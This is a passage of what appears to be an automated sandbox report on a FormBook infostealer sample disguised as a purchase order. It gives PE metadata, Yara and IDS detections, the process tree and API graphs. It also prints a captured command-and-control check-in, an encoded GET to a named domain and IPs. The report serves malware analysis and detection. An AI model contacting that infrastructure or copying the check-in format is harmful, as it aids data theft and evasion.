                        jmp dword ptr [00402000h]
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        Name | Virtual Address | Virtual Size | Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_IMPORT | 0xc98c2 | 0x4f | .text
                        IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xca000 | 0x63c | .rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xcc000 | 0xc | .reloc
                        IMAGE_DIRECTORY_ENTRY_DEBUG | 0xc62bc | 0x54 | .text
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                        IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                        Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                        .text | 0x2000 | 0xc791c | 0xc7a00 | 2a8bf27d26ded997f90668bac1c340b1 | False | 0.8597113239668128 | data | 7.708866164549466 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        .rsrc | 0xca000 | 0x63c | 0x800 | 9277d6ded9ab294ca2ea65872bd6de42 | False | 0.33935546875 | data | 3.487520827190203 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .reloc | 0xcc000 | 0xc | 0x200 | 96ac322b43fbaf6ea4e942fb2e71fe19 | False | 0.044921875 | data | 0.09800417566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                        Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                        RT_VERSION | 0xca090 | 0x3ac | data | | | 0.4148936170212766
                        RT_MANIFEST | 0xca44c | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
                        DLL | Import
                        mscoree.dll | _CorExeMain
                        Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                        2024-10-25T22:10:39.644215+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49741 | 3.33.130.190 | 80 | TCP
                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                        Oct 25, 2024 22:10:38.993120909 CEST | 49741 | 80 | 192.168.2.4 | 3.33.130.190
                        Oct 25, 2024 22:10:38.999243021 CEST | 80 | 49741 | 3.33.130.190 | 192.168.2.4
                        Oct 25, 2024 22:10:38.999429941 CEST | 49741 | 80 | 192.168.2.4 | 3.33.130.190
                        Oct 25, 2024 22:10:39.006668091 CEST | 49741 | 80 | 192.168.2.4 | 3.33.130.190
                        Oct 25, 2024 22:10:39.012780905 CEST | 80 | 49741 | 3.33.130.190 | 192.168.2.4
                        Oct 25, 2024 22:10:39.643582106 CEST | 80 | 49741 | 3.33.130.190 | 192.168.2.4
                        Oct 25, 2024 22:10:39.644032955 CEST | 80 | 49741 | 3.33.130.190 | 192.168.2.4
                        Oct 25, 2024 22:10:39.644215107 CEST | 49741 | 80 | 192.168.2.4 | 3.33.130.190
                        Oct 25, 2024 22:10:39.647439003 CEST | 49741 | 80 | 192.168.2.4 | 3.33.130.190
                        Oct 25, 2024 22:10:39.653175116 CEST | 80 | 49741 | 3.33.130.190 | 192.168.2.4
                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                        Oct 25, 2024 22:10:38.961756945 CEST | 51134 | 53 | 192.168.2.4 | 1.1.1.1
                        Oct 25, 2024 22:10:38.987521887 CEST | 53 | 51134 | 1.1.1.1 | 192.168.2.4
                        Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                        Oct 25, 2024 22:10:38.961756945 CEST | 192.168.2.4 | 1.1.1.1 | 0x8180 | Standard query (0) | www.ladylawher.org | A (IP address) | IN (0x0001) | false
                        Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                        Oct 25, 2024 22:10:38.987521887 CEST | 1.1.1.1 | 192.168.2.4 | 0x8180 | No error (0) | www.ladylawher.org | ladylawher.org | | CNAME (Canonical name) | IN (0x0001) | false
                        Oct 25, 2024 22:10:38.987521887 CEST | 1.1.1.1 | 192.168.2.4 | 0x8180 | No error (0) | ladylawher.org | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
                        Oct 25, 2024 22:10:38.987521887 CEST | 1.1.1.1 | 192.168.2.4 | 0x8180 | No error (0) | ladylawher.org | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
                        • www.ladylawher.org
                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        0 | 192.168.2.4 | 49741 | 3.33.130.190 | 80 | 3496 | C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Oct 25, 2024 22:10:39.006668091 CEST | 460 | OUT | GET /up8i/?Ax=9lO0gd2hrt6dKrz&1b80hL3=FonQAt5G6G0h5a/xcW34pfv7cxcrms3RfG5nxPFgUs1csnhs+lBXewxt89Cj5Voixu7jLVxWB2hHsNPmnpQdsR1nmqFV7MzuwwVkSFycHqtReIUzDRqobl4= HTTP/1.1
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                        Accept-Language: en-US,en;q=0.5
                        Connection: close
                        Host: www.ladylawher.org
                        User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                        Oct 25, 2024 22:10:39.643582106 CEST | 402 | IN | HTTP/1.1 200 OK
                        Server: openresty
                        Date: Fri, 25 Oct 2024 20:10:39 GMT
                        Content-Type: text/html
                        Content-Length: 262
                        Connection: close
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 41 78 3d 39 6c 4f 30 67 64 32 68 72 74 36 64 4b 72 7a 26 31 62 38 30 68 4c 33 3d 46 6f 6e 51 41 74 35 47 36 47 30 68 35 61 2f 78 63 57 33 34 70 66 76 37 63 78 63 72 6d 73 33 52 66 47 35 6e 78 50 46 67 55 73 31 63 73 6e 68 73 2b 6c 42 58 65 77 78 74 38 39 43 6a 35 56 6f 69 78 75 37 6a 4c 56 78 57 42 32 68 48 73 4e 50 6d 6e 70 51 64 73 52 31 6e 6d 71 46 56 37 4d 7a 75 77 77 56 6b 53 46 79 63 48 71 74 52 65 49 55 7a 44 52 71 6f 62 6c 34 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Ax=9lO0gd2hrt6dKrz&1b80hL3=FonQAt5G6G0h5a/xcW34pfv7cxcrms3RfG5nxPFgUs1csnhs+lBXewxt89Cj5Voixu7jLVxWB2hHsNPmnpQdsR1nmqFV7MzuwwVkSFycHqtReIUzDRqobl4="}</script></head></html>



                        Target ID:0
                        Start time:16:09:51
                        Start date:25/10/2024
                        Path:C:\Users\user\Desktop\2998MOD PO.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\2998MOD PO.exe"
                        Imagebase:0x760000
                        File size:820'736 bytes
                        MD5 hash:EBA2ADE6A60568538D8B918F65FA2F44
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:true

                        Target ID:3
                        Start time:16:10:06
                        Start date:25/10/2024
                        Path:C:\Users\user\Desktop\2998MOD PO.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Users\user\Desktop\2998MOD PO.exe"
                        Imagebase:0x50000
                        File size:820'736 bytes
                        MD5 hash:EBA2ADE6A60568538D8B918F65FA2F44
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:true

                        Target ID:4
                        Start time:16:10:06
                        Start date:25/10/2024
                        Path:C:\Users\user\Desktop\2998MOD PO.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\2998MOD PO.exe"
                        Imagebase:0xe30000
                        File size:820'736 bytes
                        MD5 hash:EBA2ADE6A60568538D8B918F65FA2F44
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2041194663.00000000018F0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2040454369.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2042765684.0000000001E20000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                        Reputation:low
                        Has exited:true

                        Target ID:7
                        Start time:16:10:16
                        Start date:25/10/2024
                        Path:C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exe"
                        Imagebase:0xdb0000
                        File size:140'800 bytes
                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3560962985.0000000002F60000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                        Reputation:high
                        Has exited:false

                        Target ID:8
                        Start time:16:10:19
                        Start date:25/10/2024
                        Path:C:\Windows\SysWOW64\colorcpl.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\SysWOW64\colorcpl.exe"
                        Imagebase:0xa00000
                        File size:86'528 bytes
                        MD5 hash:DB71E132EBF1FEB6E93E8A2A0F0C903D
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2288704216.0000000004A40000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2288668245.00000000049F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:moderate
                        Has exited:true

                        Target ID:9
                        Start time:16:10:32
                        Start date:25/10/2024
                        Path:C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exe"
                        Imagebase:0xdb0000
                        File size:140'800 bytes
                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3564602723.0000000004DF0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                        Reputation:high
                        Has exited:false

                        Target ID:10
                        Start time:16:10:44
                        Start date:25/10/2024
                        Path:C:\Program Files\Mozilla Firefox\firefox.exe
                        Wow64 process (32bit):
                        Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                        Imagebase:
                        File size:676'768 bytes
                        MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:false


                          Execution Graph

                          Execution Coverage:7.5%
                          Dynamic/Decrypted Code Coverage:100%
                          Signature Coverage:0%
                          Total number of Nodes:44
                          Total number of Limit Nodes:9
                          execution_graph 20732 56464f0 20733 564667b 20732->20733 20735 5646516 20732->20735 20735->20733 20736 5643f88 20735->20736 20737 5646770 PostMessageW 20736->20737 20738 56467dc 20737->20738 20738->20735 20716 117d6d0 DuplicateHandle 20717 117d766 20716->20717 20718 117acf0 20722 117add9 20718->20722 20727 117ade8 20718->20727 20719 117acff 20723 117ae1c 20722->20723 20724 117adf9 20722->20724 20723->20719 20724->20723 20725 117b020 GetModuleHandleW 20724->20725 20726 117b04d 20725->20726 20726->20719 20728 117ae1c 20727->20728 20729 117adf9 20727->20729 20728->20719 20729->20728 20730 117b020 GetModuleHandleW 20729->20730 20731 117b04d 20730->20731 20731->20719 20739 117d080 20740 117d0c6 GetCurrentProcess 20739->20740 20742 117d111 20740->20742 20743 117d118 GetCurrentThread 20740->20743 20742->20743 20744 117d155 GetCurrentProcess 20743->20744 20745 117d14e 20743->20745 20746 117d18b 20744->20746 20745->20744 20747 117d1b3 GetCurrentThreadId 20746->20747 20748 117d1e4 20747->20748 20749 1174668 20750 117467a 20749->20750 20751 1174686 20750->20751 20753 1174779 20750->20753 20754 117479d 20753->20754 20758 1174878 20754->20758 20762 1174888 20754->20762 20760 11748af 20758->20760 20759 117498c 20759->20759 20760->20759 20766 11744b4 20760->20766 20764 11748af 20762->20764 20763 117498c 20763->20763 20764->20763 20765 11744b4 CreateActCtxA 20764->20765 20765->20763 20767 1175918 CreateActCtxA 20766->20767 20769 11759db 20767->20769

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 294 117d070-117d10f GetCurrentProcess 298 117d111-117d117 294->298 299 117d118-117d14c GetCurrentThread 294->299 298->299 300 117d155-117d189 GetCurrentProcess 299->300 301 117d14e-117d154 299->301 302 117d192-117d1ad call 117d658 300->302 303 117d18b-117d191 300->303 301->300 307 117d1b3-117d1e2 GetCurrentThreadId 302->307 303->302 308 117d1e4-117d1ea 307->308 309 117d1eb-117d24d 307->309 308->309
                          APIs
                          • GetCurrentProcess.KERNEL32 ref: 0117D0FE
                          • GetCurrentThread.KERNEL32 ref: 0117D13B
                          • GetCurrentProcess.KERNEL32 ref: 0117D178
                          • GetCurrentThreadId.KERNEL32 ref: 0117D1D1
                          Memory Dump Source
                          • Source File: 00000000.00000002.1862940170.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1170000_2998MOD PO.jbxd
                          Similarity
                          • API ID: Current$ProcessThread
                          • API String ID: 2063062207-0
                          • Opcode ID: 7ffc520767d9da7581e2f6b81fa93e2a94c27a323474b6b9b57a24d4404d0253
                          • Instruction ID: 7988ee3d1f80a128a131971cde47b19c9e5afb721ddfa78c53a73a8ec35efbf9
                          • Instruction Fuzzy Hash: BC5174B09003098FDB08CFA9E948BDEBFF5AF48304F24C469E419A7360DB749984CB65

                          Control-flow Graph (first node 117d080-117d10f GetCurrentProcess)
                          APIs
                          • GetCurrentProcess.KERNEL32 ref: 0117D0FE
                          • GetCurrentThread.KERNEL32 ref: 0117D13B
                          • GetCurrentProcess.KERNEL32 ref: 0117D178
                          • GetCurrentThreadId.KERNEL32 ref: 0117D1D1
                          Memory Dump Source
                          • Source File: 00000000.00000002.1862940170.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1170000_2998MOD PO.jbxd
                          Similarity
                          • API ID: Current$ProcessThread
                          • API String ID: 2063062207-0
                          • Opcode ID: 1c4fc29942c13df86f62bead4a3a2104d94cf3ccd47ff485567bcedc1ca2a83b
                          • Instruction ID: 8b7cbe53d083f1342265d83a990b2abc9b0deff2914303cdbd7f3c230591284e
                          • Instruction Fuzzy Hash: B75155B09013098FDB08DFA9E548BDEBFF5AF88314F20C459E409A7360DB749984CB65

                          Control-flow Graph (first node 117ade8-117adf7)
                          APIs
                          • GetModuleHandleW.KERNELBASE(00000000), ref: 0117B03E
                          Memory Dump Source
                          • Source File: 00000000.00000002.1862940170.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1170000_2998MOD PO.jbxd
                          Similarity
                          • API ID: HandleModule
                          • API String ID: 4139908857-0
                          • Opcode ID: e499e602db390c59467129f5a1d96b6a871fab78489fc55f2c7911cb9e918853
                          • Instruction ID: 1c419cb6ee4ac5f46c871334d4e53f76dc741d9ba7b12d48046dc561a1c299d0
                          • Instruction Fuzzy Hash: 5F7134B0A00B058FE729DF29E44575ABBF5FF88304F048A29D08AD7B50DB35E946CB95

                          Control-flow Graph (first node 11744b4-11759d9 CreateActCtxA)
                          APIs
                          • CreateActCtxA.KERNEL32(?), ref: 011759C9
                          Memory Dump Source
                          • Source File: 00000000.00000002.1862940170.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1170000_2998MOD PO.jbxd
                          Similarity
                          • API ID: Create
                          • API String ID: 2289755597-0
                          • Opcode ID: 9f74f177f991115e67eca055405108cf75498a9ba0ea3eda087ce7d9cf3b53ab
                          • Instruction ID: accddd6d18e0135e811f21101de493bd81b51f0aa14857e6910bffd0ce1ff95c
                          • Instruction Fuzzy Hash: 8941F2B0C0071DDBDB28DFA9C884BDDBBB6BF49304F20806AD408AB251DB756945CF90

                          Control-flow Graph (first node 117590c-1175913)
                          APIs
                          • CreateActCtxA.KERNEL32(?), ref: 011759C9
                          Memory Dump Source
                          • Source File: 00000000.00000002.1862940170.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1170000_2998MOD PO.jbxd
                          Similarity
                          • API ID: Create
                          • API String ID: 2289755597-0
                          • Opcode ID: 5c696cab11aa6169b4ce1e373a14b50fd0e8f723a27856c3c7521093aea60263
                          • Instruction ID: 4555fdb8339bb8899f1f602a6cf3b69b63e2b7f74b7dd4fc1a572093acec9844
                          • Instruction Fuzzy Hash: BA41E2B1C00719CFDB28DFA9C8857CDBBB6BF49304F64806AD408AB255DB756985CF90

                          Control-flow Graph (first node 117d6c8-117d764 DuplicateHandle)
                          APIs
                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0117D757
                          Memory Dump Source
                          • Source File: 00000000.00000002.1862940170.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1170000_2998MOD PO.jbxd
                          Similarity
                          • API ID: DuplicateHandle
                          • API String ID: 3793708945-0
                          • Opcode ID: 99bc46f7cc900a5bdd6b4e455613aec79a87d85f07bcbde9c0aac928106710a6
                          • Instruction ID: e4c8913203f88d11729e5b77a2724fc745d52da5bfafa24cbb9246a69880d3d5
                          • Instruction Fuzzy Hash: A321E0B59002489FDB10CFAAD984AEEBFF5EB48310F14841AE958B7310D374A954CFA5

                          Control-flow Graph (first node 117d6d0-117d764 DuplicateHandle)
                          APIs
                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0117D757
                          Memory Dump Source
                          • Source File: 00000000.00000002.1862940170.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1170000_2998MOD PO.jbxd
                          Similarity
                          • API ID: DuplicateHandle
                          • API String ID: 3793708945-0
                          • Opcode ID: 7fb8ebaecad05235aca3538d64aad39dba590765272505df1f38ee6cbb13bf59
                          • Instruction ID: 4b9a367009a3b471f3f0336dc5cf4917ac43635c00675019d0b3d5521eb25fd6
                          • Instruction Fuzzy Hash: 1221E0B59002489FDB10CFAAD984ADEFBF8EB48320F14841AE958B3310D374A944CFA5

                          Control-flow Graph (first node 117afd8-117b018)
                          APIs
                          • GetModuleHandleW.KERNELBASE(00000000), ref: 0117B03E
                          Memory Dump Source
                          • Source File: 00000000.00000002.1862940170.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1170000_2998MOD PO.jbxd
                          Similarity
                          • API ID: HandleModule
                          • API String ID: 4139908857-0
                          • Opcode ID: c06c479c74de0b39a2b43be4fb5dbbc531d116ab0822be306599ea730891e9c8
                          • Instruction ID: 7d2cf34663368bc3bf08150ecdc018a99a0d8f52b9f45cfffb4e7bab08e25d4b
                          • Instruction Fuzzy Hash: 43110FB6C002498FDB14CF9AC444ADEFBF4AB88224F10842AD568B7210D379A545CFA5

                          Control-flow Graph (first node 5643f88-56467da PostMessageW)
                          APIs
                          • PostMessageW.USER32(?,00000010,00000000,?), ref: 056467CD
                          Memory Dump Source
                          • Source File: 00000000.00000002.1867441043.0000000005640000.00000040.00000800.00020000.00000000.sdmp, Offset: 05640000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_5640000_2998MOD PO.jbxd
                          Similarity
                          • API ID: MessagePost
                          • API String ID: 410705778-0
                          • Opcode ID: 452170013f01aa6440af0dbff12febb86e16ff70a34fe1a86295bd92dcb71194
                          • Instruction ID: 862daf132318566208b9ea0566af9e833544e43263575dc80a90eff10fff283c
                          • Instruction Fuzzy Hash: E011F2B58003489FCB10DF9AD485BDEBBF8EB48320F108419E959A7200C375A984CFA5

                          Control-flow Graph (first node 5646769-56467da PostMessageW)
                          APIs
                          • PostMessageW.USER32(?,00000010,00000000,?), ref: 056467CD
                          Memory Dump Source
                          • Source File: 00000000.00000002.1867441043.0000000005640000.00000040.00000800.00020000.00000000.sdmp, Offset: 05640000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_5640000_2998MOD PO.jbxd
                          Similarity
                          • API ID: MessagePost
                          • API String ID: 410705778-0
                          • Opcode ID: 1b4f91953702c665cc296368bbef60a64c25929f75d042c871835dbd593f951b
                          • Instruction ID: 7702ba80fee8dd63eb68e5329a3e27e69128ebda9256e6f987100f59b24543f5
                          • Instruction Fuzzy Hash: EB1103B5800249DFDB10DF99C485BDEFBF8FB48320F20841AD559A7210C375A984CFA1
                          Memory Dump Source
                          • Source File: 00000000.00000002.1862667070.0000000000F0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F0D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f0d000_2998MOD PO.jbxd
                          Similarity
                          • Opcode ID: d7b19897eec0229e37733f5270c8a870a778bf04469c5fb1937215474179e09c
                          • Instruction ID: 5bb81a981a12de8bc92eb1beff0904c588db825bd810185c3c378aa8a04f5ca4
                          • Instruction Fuzzy Hash: 1521377A500204DFDB05DF54D9C0B2BBF65FB98324F20C169E9094B296C336E856FBA2
                          Memory Dump Source
                          • Source File: 00000000.00000002.1862707516.0000000000F1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F1D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f1d000_2998MOD PO.jbxd
                          Similarity
                          • Opcode ID: b129c2030ae5b9f2d24859f9e51c5631871e735db9bfac9b8436b6dc496c5248
                          • Instruction ID: 975d9d486ca3a431f1583f227082d3345eba4129256ce148c48a1921bbc537fa
                          • Instruction Fuzzy Hash: A4212671904284EFDB05DF14D9C0B66BBB5FB84324F30C66DE8094B296C33AD886EA61
                          Memory Dump Source
                          • Source File: 00000000.00000002.1862707516.0000000000F1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F1D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f1d000_2998MOD PO.jbxd
                          Similarity
                          • Opcode ID: bd4241cb9168b443275b13eb99a7a5ec70bf32fec000231ac4fb140f91c0cdb5
                          • Instruction ID: 8b86c33cc68e2577360f38a32aade5ff8174c1547228f3b47634756c5876a6d4
                          • Instruction Fuzzy Hash: A821F575504200DFCB14DF14D984B56BB75EB88324F20C56DD80A4B25AC33AD887DA61
                          Memory Dump Source
                          • Source File: 00000000.00000002.1862707516.0000000000F1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F1D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f1d000_2998MOD PO.jbxd
                          Similarity
                          • Opcode ID: bd0581a60090b6af27bd246cd7bcb85cea4b3af54848e75445cf93538388d94a
                          • Instruction ID: 84d2f8296d100258e8cf4b29a43c59f3b1075f1e09a8c79adf52549408944d80
                          • Instruction Fuzzy Hash: 492180755093808FCB02CF24D994756BF71EB46314F28C5EAD8498F2A7C33A984ADB62
                          Memory Dump Source
                          • Source File: 00000000.00000002.1862667070.0000000000F0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F0D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f0d000_2998MOD PO.jbxd
                          Similarity
                          • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                          • Instruction ID: 501511c095f53ef4eb63a3e9a813edb89b057594f5a8156ac4ca4eefdf1ddd92
